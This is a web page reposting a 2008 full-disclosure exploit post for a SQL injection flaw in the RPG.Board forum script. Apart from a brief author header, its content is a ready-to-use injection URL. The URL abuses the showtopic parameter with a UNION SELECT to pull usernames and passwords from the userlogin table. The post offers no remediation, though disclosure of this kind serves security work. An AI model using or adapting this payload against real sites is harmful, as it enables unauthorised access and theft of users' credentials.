Computer Security

Security Advisory: RPG.Board <= 0.0.8Beta2 Remote SQL Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  ASP News Remote Password Disclouse Vulnerability

  csphonebook 1.02 Remote XSS Vulnerabilitiy

  shoutbox Remote Password Disclouse Vulnerability

  hyBook Remote Password Disclouse Vulnerability

From:Guns_(at)_0x90.com.ar <Guns_(at)_0x90.com.ar>
Date:30.09.2008
Subject:RPG.Board <= 0.0.8Beta2 Remote SQL Injection

[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: RPG.Board

[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69

[~] Vulnerability Class: SQL Injection



[~] Exploit:

Register, login and testing exploit..

http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,
concat(user,0x3a,pw),null+from+[PREFIX]_userlogin
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server